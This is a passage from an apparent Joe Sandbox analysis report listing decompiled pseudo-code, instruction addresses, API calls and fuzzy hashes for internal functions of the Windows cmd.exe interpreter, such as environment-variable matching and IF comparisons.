														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0xdad5cc;
													if( *0xdad5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E00DA916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0xdad560;
															_t382 = _v1684;
															if( *0xdad560 != 0) {
																_t295 = E00D90178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E00DA84FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E00D85712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0xdad5cc;
															if( *0xdad5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E00DA916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0xdad560;
															_t360 = _v1684;
															if( *0xdad560 != 0) {
																_t299 = E00D90178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E00DA84FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E00D8CD27(_v1664);
																		E00D8DB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0xdad5cc;
														if( *0xdad5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0xdad5cc = 0;
													E00D8DB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E00DA8E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0xdad564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E00D85400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E00D925D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E00D8C108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E00D8AD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E00DA8F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E00D85DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E00D8CD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E00D90178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0xdad5cc;
																if( *0xdad5cc == 0) {
																	_t274 = _v1112;
																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E00D85712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E00DA916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0xdad560;
																		if( *0xdad560 != 0) {
																			_t281 = E00D90178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E00DA84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E00D8CD27(_v1664);
																					E00D8DB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0xdad5cc = 0;
																E00D8DB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E00D8C108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E00D856AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E00D96A1C(E00D96A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E00D8CD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E00D8CD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E00D96FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}

0x00da85e9
0x00da85e9
0x00da85ec
0x00da85f0
0x00da85f2
0x00da85f4
0x00da85f5
0x00da85fb
0x00da85fb
0x00da85ff
0x00da8607
0x00da8617
0x00da8624
0x00da8629
0x00da8629
0x00da8633
0x00da8649
0x00da8649
0x00da864e
0x00da8654
0x00000000
0x00000000
0x00da8640
0x00da8644
0x00da8644
0x00da865d
0x00da8663
0x00da866c
0x00da8672
0x00da8679
0x00da8681
0x00da8682
0x00da8688
0x00da868d
0x00da868f
0x00da869e
0x00da86a3
0x00da86a4
0x00da86ac
0x00da86af
0x00da86b6
0x00da86be
0x00da86cc
0x00da86d3
0x00da86e4
0x00da86ec
0x00da86fa
0x00da8701
0x00da8712
0x00da871d
0x00da873d
0x00da8e1a
0x00da8e36
0x00da8e3b
0x00da879b
0x00da87a8
0x00da87ad
0x00da87b3
0x00000000
0x00da87b9
0x00da87c0
0x00da87f3
0x00000000
0x00da87c2
0x00da87ce
0x00da87d2
0x00da87d7
0x00da87dd
0x00da87eb
0x00da87ed
0x00da87f7
0x00da87f7
0x00da87f7
0x00da87fb
0x00da87fe
0x00da8802
0x00da8804
0x00da880b
0x00000000
0x00000000
0x00da880d
0x00da8810
0x00da8816
0x00000000
0x00da8818
0x00da8818
0x00000000
0x00da8818
0x00000000
0x00da8816
0x00da881f
0x00da8829
0x00da8833
0x00da8838
0x00da8838
0x00da883f
0x00da8842
0x00da8844
0x00da8849
0x00da8849
0x00da884c
0x00da884c
0x00da884f
0x00da8856
0x00000000
0x00000000
0x00da885c
0x00da8863
0x00da8865
0x00da8867
0x00da8867
0x00da8877
0x00da887c
0x00da887e
0x00000000
0x00da8884
0x00da8884
0x00da888c
0x00da8891
0x00da889a
0x00da889c
0x00da889e
0x00da889e
0x00da88a2
0x00da88b2
0x00da88b7
0x00da88b9
0x00000000
0x00da88bf
0x00da88bf
0x00da88c6
0x00da88c8
0x00da88ca
0x00da88cc
0x00da88cc
0x00da88d2
0x00da88d5
0x00da88db
0x00da88dd
0x00da88df
0x00da88df
0x00da88e6
0x00da88eb
0x00da88ee
0x00da88f0
0x00da8921
0x00da8923
0x00da8926
0x00da8e0a
0x00da8de9
0x00da8deb
0x00da8dec
0x00da8da2
0x00da8da4
0x00da8da6
0x00da8dab
0x00da8daf
0x00da8db6
0x00da8dbb
0x00da8d9d
0x00da8d9d
0x00000000
0x00da8d9d
0x00da892e
0x00da8933
0x00da8935
0x00da8942
0x00da8937
0x00da8937
0x00da893c
0x00da893c
0x00da8946
0x00da894d
0x00da894f
0x00da8951
0x00da8951
0x00da895b
0x00da8968
0x00da896d
0x00da8974
0x00da8978
0x00da8e00
0x00da8df7
0x00da8df7
0x00da8dfc
0x00da8de4
0x00da8de4
0x00000000
0x00da8de4
0x00da897e
0x00da8985
0x00da8987
0x00da8989
0x00da8989
0x00da898e
0x00da8994
0x00da899b
0x00da899d
0x00da89d2
0x00da89d4
0x00da89d6
0x00da89d6
0x00da89e3
0x00da89e5
0x00da89e9
0x00da899f
0x00da899f
0x00da89a1
0x00da89a3
0x00da89a3
0x00da89a7
0x00da89ac
0x00da89b0
0x00da89b4
0x00da89b7
0x00da8df3
0x00da8df3
0x00000000
0x00da8df3
0x00da89be
0x00da89c6
0x00da89cc
0x00da89cc
0x00da89ed
0x00da89f0
0x00000000
0x00000000
0x00da89f6
0x00da89fd
0x00da8a85
0x00da8a85
0x00da8a8f
0x00da8a8f
0x00da8a91
0x00000000
0x00000000
0x00da8a97
0x00da8a9e
0x00da8aa0
0x00da8aa2
0x00da8aa2
0x00da8ab0
0x00da8ab5
0x00da8abc
0x00da8ac0
0x00da8ac2
0x00da8ac7
0x00da8ac9
0x00da8b01
0x00da8acb
0x00da8acb
0x00da8ad2
0x00da8ad4
0x00da8ad6
0x00da8ad6
0x00da8aea
0x00da8aef
0x00da8af1
0x00000000
0x00000000
0x00da8af7
0x00da8afb
0x00da8afb
0x00da8ac9
0x00da8b05
0x00da8b0c
0x00da8b0e
0x00da8b10
0x00da8b10
0x00da8b26
0x00da8b2b
0x00da8b32
0x00da8a8b
0x00000000
0x00da8a8b
0x00000000
0x00da8b32
0x00da8a03
0x00da8a03
0x00da8a08
0x00da8a0a
0x00da8a11
0x00da8a13
0x00da8a15
0x00da8a15
0x00da8a23
0x00da8a28
0x00da8a2f
0x00da8a33
0x00da8a35
0x00da8a3a
0x00da8a3c
0x00da8a74
0x00da8a3e
0x00da8a3e
0x00da8a45
0x00da8a47
0x00da8a49
0x00da8a49
0x00da8a5d
0x00da8a62
0x00da8a64
0x00da8d8d
0x00da8d94
0x00da8d99
0x00000000
0x00da8d99
0x00da8a6a
0x00da8a6e
0x00da8a6e
0x00da8a3c
0x00da8a33
0x00da8a78
0x00da8a7f
0x00000000
0x00000000
0x00da8a7f
0x00da8b38
0x00da8b38
0x00da8b3c
0x00da8b41
0x00da8b46
0x00da88f2
0x00da88fc
0x00da8901
0x00da8905
0x00da8905
0x00da8b4a
0x00da8b4d
0x00da8b4f
0x00da8b54
0x00da8b56
0x00da8b5c
0x00da8b5c
0x00da8b5f
0x00da8b61
0x00da8b66
0x00da8b66
0x00da8b69
0x00da8b69
0x00da8b6c
0x00da8b73
0x00da8b75
0x00da8b77
0x00da8b77
0x00da8b8a
0x00da8b8f
0x00da8b91
0x00da8b9e
0x00da8ba5
0x00da8ba7
0x00da8ba9
0x00da8ba9
0x00da8bb0
0x00da8bb6
0x00da8b93
0x00da8b95
0x00da8b96
0x00da8b97
0x00da8b97
0x00da8bbd
0x00da8bc4
0x00da8bc6
0x00da8bc8
0x00da8bc8
0x00da8bcf
0x00da8bd4
0x00da8bd6
0x00da8bdc
0x00da8be3
0x00da8be5
0x00da8be7
0x00da8be7
0x00da8beb
0x00da8bf2
0x00da8bf4
0x00da8bf6
0x00da8bf6
0x00da8bfd
0x00da8c02
0x00da8c04
0x00da8c1a
0x00da8c21
0x00da8c23
0x00da8c25
0x00da8c25
0x00da8c35
0x00da8c37
0x00da8c3a
0x00da8ddb
0x00da8de0
0x00000000
0x00da8de0
0x00da8c42
0x00da8c47
0x00da8c49
0x00da8cf3
0x00da8cf3
0x00da8c4f
0x00da8c4f
0x00da8c54
0x00da8c54
0x00da8cf7
0x00da8cfe
0x00da8c5d
0x00da8c64
0x00da8c66
0x00da8c68
0x00da8c68
0x00da8c7e
0x00da8c83
0x00da8c85
0x00da8c87
0x00da8c8e
0x00da8c90
0x00da8c92
0x00da8c92
0x00da8ca4
0x00da8ca9
0x00da8cb0
0x00da8cb6
0x00da8cbb
0x00da8cbd
0x00da8cbf
0x00da8cc6
0x00da8cc8
0x00da8cca
0x00da8cca
0x00da8cde
0x00da8ce3
0x00da8ce5
0x00da8dc5
0x00da8dcc
0x00da8dd1
0x00000000
0x00da8dd1
0x00da8cef
0x00da8cef
0x00da8cbd
0x00000000
0x00da8cb0
0x00da8c85
0x00da8d04
0x00da8d08
0x00da8d0d
0x00da8d12
0x00da8c06
0x00da8c08
0x00da8c09
0x00da8c0e
0x00da8c14
0x00da8c04
0x00da8d16
0x00da8d19
0x00da8d19
0x00da8d21
0x00da8d21
0x00da8d21
0x00da8d23
0x00da8d2f
0x00da8d2f
0x00da8d38
0x00da8d42
0x00da8d47
0x00da8d49
0x00000000
0x00da8d4f
0x00da8d53
0x00da8d5f
0x00da8d6d
0x00da8d7b
0x00da8d82
0x00da8d82
0x00da8d49
0x00da88b9
0x00000000
0x00da887e
0x00da8e15
0x00da8e15
0x00000000
0x00da87dd
0x00da87c0
0x00da87b3
0x00da8e3d
0x00da8e44
0x00da8e45
0x00da8e46
0x00da8e51

APIs

longjmp.MSVCRT(00DBB8F8,00000001,00000000,00DA8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 00DA865D
memset.MSVCRT ref: 00DA86B6
memset.MSVCRT ref: 00DA86E4
memset.MSVCRT ref: 00DA8712

Part of subcall function 00D8CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00DA9362,00000000,00000000,?,00D99814,00000000), ref: 00D8CD55

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

Part of subcall function 00D8585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,00DA87AD,?,00000000,-00000105,-00000105,-00000105), ref: 00D85875

Strings

%9d, xrefs: 00DA860C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$AllocCloseFindVirtuallongjmp
String ID: %9d
API String ID: 973120493-2241623522
Opcode ID: af5a23b94301c9fbaff8bc57dd19a44764a81c0ae56a26d1784d8b04c04bfc99
Instruction ID: 95a3e2b2ce4a1f829d8c96643b1a26c727af01f4af3b1a3bf8428cbc9209fe34
Opcode Fuzzy Hash: af5a23b94301c9fbaff8bc57dd19a44764a81c0ae56a26d1784d8b04c04bfc99
Instruction Fuzzy Hash: EA51A3B19083819FD724EB34D885AAB7BD9EB85314F04092EF989D3281EF74D944CB76

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00DA2BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E00D91040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E00DA213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E00DA292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E00DA2913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E00DA2D56();
				}
				return E00D96FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}

0x00da2bfb
0x00da2c02
0x00da2c06
0x00da2c11
0x00da2c19
0x00da2c26
0x00da2c2b
0x00da2c2d
0x00da2c33
0x00da2c39
0x00da2c3c
0x00da2c3f
0x00000000
0x00000000
0x00000000
0x00da2c3f
0x00da2c49
0x00da2c4b
0x00da2c4f
0x00da2c57
0x00da2c5a
0x00da2c5c
0x00da2c8f
0x00da2c8f
0x00da2c5e
0x00da2c63
0x00da2c68
0x00da2c70
0x00da2c74
0x00da2c7b
0x00000000
0x00da2c7d
0x00da2c7d
0x00da2c80
0x00da2c81
0x00da2c84
0x00da2c87
0x00000000
0x00da2c89
0x00000000
0x00da2c89
0x00da2c87
0x00000000
0x00da2c7b
0x00da2c8d
0x00000000
0x00000000
0x00da2c8d
0x00da2c92
0x00da2c92
0x00da2c94
0x00da2c94
0x00da2cab
0x00da2cad
0x00da2cb5
0x00da2cde
0x00da2ce4
0x00da2cee
0x00da2cf0
0x00da2cf5
0x00da2cf9
0x00da2d1c
0x00da2d1d
0x00da2d1f
0x00000000
0x00da2cfb
0x00da2cfb
0x00da2cfe
0x00da2d09
0x00da2d0e
0x00da2d0e
0x00da2cb7
0x00da2cc0
0x00da2d22
0x00da2d22
0x00da2cc2
0x00da2cc2
0x00da2cc5
0x00da2ccf
0x00da2cd4
0x00da2cda
0x00da2cda
0x00da2cc0
0x00da2d26
0x00da2d33
0x00da2d37
0x00da2d3c
0x00da2d3c
0x00da2d53

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00DA2CA5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA2CB7
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DA2D29

Strings

_p0, xrefs: 00DA2C5E
wil, xrefs: 00DA2CCA, 00DA2D04

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseErrorHandleLastOpenSemaphore
String ID: _p0$wil
API String ID: 3419097560-1814513734
Opcode ID: 9f4db6a6466c33e2724fcb091dd1efb4c40819324603f68ebb12cf1a00560ce8
Instruction ID: 7832f3bff017b3f384c16de31f5d8fac662b9ed137fa8db828a674c11ec83123
Opcode Fuzzy Hash: 9f4db6a6466c33e2724fcb091dd1efb4c40819324603f68ebb12cf1a00560ce8
Instruction Fuzzy Hash: 52411A71A402298BCF25DF29C945BBE77B5EB86710F158198E809DB345DB70CE05C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00DA4588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0xdb3834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E00D8DF40(E00D8DEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E00D92349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E00D8C5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E00D90040(_v12);
						return _v8;
					}
					while( *0xdad544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E00D925D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E00D97721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}

0x00da4591
0x00da4599
0x00da45a0
0x00da45d2
0x00da45d4
0x00da45d9
0x00da45be
0x00000000
0x00da45c0
0x00da45dd
0x00da45e0
0x00da45e7
0x00da45eb
0x00da45eb
0x00da45ee
0x00da45f2
0x00da45f5
0x00da45f5
0x00da45f8
0x00da45f8
0x00da45fb
0x00da45fe
0x00da4605
0x00da4609
0x00da460c
0x00da460f
0x00da4612
0x00da4612
0x00da4615
0x00da4618
0x00da461d
0x00da461f
0x00da4621
0x00da4681
0x00da468b
0x00da4693
0x00da4696
0x00000000
0x00da469b
0x00da4623
0x00da462e
0x00da4658
0x00da4658
0x00da465b
0x00da465e
0x00da4661
0x00da4663
0x00da4666
0x00da4666
0x00da4669
0x00da466c
0x00da4672
0x00da4674
0x00da4676
0x00000000
0x00000000
0x00da467d
0x00da467f
0x00000000
0x00000000
0x00000000
0x00da467f
0x00da4635
0x00da463b
0x00da4640
0x00000000
0x00000000
0x00da4642
0x00da4648
0x00da4651
0x00da4653
0x00000000
0x00da4653
0x00da467a
0x00000000
0x00da467a
0x00da45a2
0x00da45b5
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 00DA4635

Part of subcall function 00D97721: __iob_func.MSVCRT ref: 00D97726

fprintf.MSVCRT ref: 00DA45B5

Strings

%s, xrefs: 00DA4643
Null environment, xrefs: 00DA45A2
CMD Internal Error %s, xrefs: 00DA45A7

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: __iob_func_wcsnicmpfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 1828771275-2781220306
Opcode ID: cb331937a76b180ab67eac252e1521a985dada802d923176adb751a5d71032c5
Instruction ID: a217ab7244a992b8a44e48606213e2bbbe68bc9c882da3532840367343575c0f
Opcode Fuzzy Hash: cb331937a76b180ab67eac252e1521a985dada802d923176adb751a5d71032c5
Instruction Fuzzy Hash: AA310A36E00211DBCF28AB689C459BEB3A1DFD5700F1D0569EC1AA3681EBB05E018775

Uniqueness

Uniqueness Score: -1.00%

Function 00D8AEB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00D8AEB0(void* __ecx, intOrPtr _a4) {
				wchar_t* _v8;
				wchar_t* _v12;
				long _t25;
				signed int _t26;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr _t45;
				long _t48;
				signed int _t49;

				_t45 = _a4;
				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
				if( *_v8 != 0 ||  *_v12 != 0) {
					_push( *(_t45 + 0x3c));
					_push( *(_t45 + 0x38));
					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
						_t26 = lstrcmpiW();
					} else {
						_t26 = lstrcmpW();
					}
					_t49 = _t26;
					goto L3;
				} else {
					_t49 = _t48 - _t25;
					L3:
					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
					if(_t28 == 0) {
						_t30 = 0 | _t49 == 0x00000000;
						L9:
						return _t30;
					}
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t30 = 0 | _t49 != 0x00000000;
						goto L9;
					}
					_t33 = _t31 - 1;
					if(_t33 == 0) {
						L14:
						_t30 = _t49 >> 0x1f;
						goto L9;
					}
					_t34 = _t33 - 1;
					if(_t34 == 0) {
						_t30 = 0 | _t49 <= 0x00000000;
						goto L9;
					}
					_t36 = _t34 - 1;
					if(_t36 != 0) {
						if(_t36 != 1) {
							_t30 = 0;
							goto L9;
						}
						_t49 =  !_t49;
						goto L14;
					}
					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
					goto L9;
				}
			}

0x00d8aeba
0x00d8aecd
0x00d8aed7
0x00d8aee6
0x00d8af49
0x00d8af4c
0x00d8af4f
0x00d8af5b
0x00d8af51
0x00d8af51
0x00d8af51
0x00d8af57
0x00000000
0x00d8aef0
0x00d8aef0
0x00d8aef2
0x00d8aef5
0x00d8aef8
0x00d8af20
0x00d8af13
0x00d8af19
0x00d8af19
0x00d8aefa
0x00d8aefd
0x00d8af29
0x00000000
0x00d8af29
0x00d8aeff
0x00d8af02
0x00d8af35
0x00d8af38
0x00000000
0x00d8af38
0x00d8af04
0x00d8af07
0x00d8af40
0x00000000
0x00d8af40
0x00d8af09
0x00d8af0c
0x00d8af31
0x00d8af63
0x00000000
0x00d8af63
0x00d8af33
0x00000000
0x00d8af33
0x00d8af10
0x00000000
0x00d8af10

APIs

wcstol.MSVCRT ref: 00D8AEC7
wcstol.MSVCRT ref: 00D8AED7
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 00D8AF51
lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 00D8AF5B

Strings

itht, xrefs: 00D8AF5B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcstol$lstrcmplstrcmpi
String ID: itht
